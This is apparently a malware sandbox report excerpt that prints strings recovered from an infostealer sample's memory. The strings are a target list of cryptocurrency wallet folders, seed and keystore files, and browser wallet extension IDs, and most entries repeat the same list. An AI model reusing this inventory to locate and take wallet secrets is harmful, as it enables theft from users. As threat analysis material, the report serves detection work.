                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum\wallets\\*.*
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda 